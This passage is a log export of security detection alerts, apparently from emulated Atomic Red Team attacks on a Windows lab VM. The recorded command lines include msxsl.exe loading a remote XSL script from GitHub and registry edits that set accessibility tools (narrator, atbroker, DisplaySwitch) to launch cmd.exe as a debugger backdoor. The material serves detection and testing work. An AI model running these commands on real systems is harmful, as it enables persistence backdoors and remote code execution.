<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.062635,2019-07-19T18:50:53.062635+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:53.011281Z"">
</TimeCreated>
<EventRecordID>3760</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:52.989</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CC-5D31-0000-001038513300</Data>
<Data Name=""ProcessId"">948</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslxmlfile.xml https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/msxslscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547853.011281,2019-07-19T18:50:53.011281+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:50.086593Z"">
</TimeCreated>
<EventRecordID>3759</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:50.067</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010CF443300</Data>
<Data Name=""ProcessId"">6268</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547850.086593,2019-07-19T18:50:50.086593+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:50.046476Z"">
</TimeCreated>
<EventRecordID>3758</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:50.029</Data>
<Data Name=""ProcessGuid"">747F3D96-D8CA-5D31-0000-0010DA413300</Data>
<Data Name=""ProcessId"">4004</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;C:\Windows\Temp\msxsl.exe C:\AtomicRedTeam\atomics\T1220\src\msxslxmlfile.xml C:\AtomicRedTeam\atomics\T1220\src\msxslscript.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563547850.046476,2019-07-19T18:50:50.046476+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) ran process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated a network connection from hostname ( MSEDGEWIN10.home ) and IP ( 10.0.2.15 ) to hostname ( ams15s30-in-f4.1e100.net ) , IP ( 172.217.17.132 ) and port ( 80 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:25.376030Z"">
</TimeCreated>
<EventRecordID>3757</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:50:20.871</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49727</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">172.217.17.132</Data>
<Data Name=""DestinationHostname"">ams15s30-in-f4.1e100.net</Data>
<Data Name=""DestinationPort"">80</Data>
<Data Name=""DestinationPortName"">http</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547825.37603,2019-07-19T18:50:25.376030+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:19.549321Z"">
</TimeCreated>
<EventRecordID>3756</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:19.533</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-0010A4D53200</Data>
<Data Name=""ProcessId"">1888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.491237,2019-07-19T18:50:19.491237+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:19.467476Z"">
</TimeCreated>
<EventRecordID>3753</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:19.455</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AB-5D31-0000-001054D03200</Data>
<Data Name=""ProcessId"">6244</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\atbroker.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547819.467476,2019-07-19T18:50:19.467476+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:18.009564Z"">
</TimeCreated>
<EventRecordID>3752</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:18.000</Data>
<Data Name=""ProcessGuid"">747F3D96-D8AA-5D31-0000-0010C0C93200</Data>
<Data Name=""ProcessId"">6016</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.963904,2019-07-19T18:50:17.963904+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:17.941637Z"">
</TimeCreated>
<EventRecordID>3749</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:17.916</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A9-5D31-0000-001072C43200</Data>
<Data Name=""ProcessId"">6068</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\DisplaySwitch.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547817.941637,2019-07-19T18:50:17.941637+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:14.827321Z"">
</TimeCreated>
<EventRecordID>3748</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:14.762</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-0010F9B13200</Data>
<Data Name=""ProcessId"">6664</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.692289,2019-07-19T18:50:14.692289+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:14.678185Z"">
</TimeCreated>
<EventRecordID>3745</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:50:14.649</Data>
<Data Name=""ProcessGuid"">747F3D96-D8A6-5D31-0000-001053A73200</Data>
<Data Name=""ProcessId"">6888</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;reg add &quot; HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution &quot;Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563547814.678185,2019-07-19T18:50:14.678185+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:50:13.185016Z"">
</TimeCreated>
<EventRecordID>3744</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
